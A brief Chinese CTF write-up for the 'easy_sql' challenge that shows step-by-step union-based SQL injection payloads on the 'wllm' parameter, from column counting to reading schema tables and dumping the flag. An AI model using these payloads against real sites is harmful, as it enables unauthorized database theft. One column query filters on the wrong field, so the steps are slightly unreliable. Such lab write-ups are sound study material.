跳转至

easy_sql

title提示参数是wllm

image-20230508181638284

order by查看有几列

image-20230508181835146

得到3列

改wllm=-1

?wllm=-1’ union select 1,2,3 --+

得到2,3

?wllm=-1' union select 1,2,database()--+

image-20230508182512722

?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+

image-20230508183530836

?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test_tb'--+

image-20230508183620245

/?wllm=-1' union select 1,2,group_concat(id,flag) from test_tb--+

得到flag

评论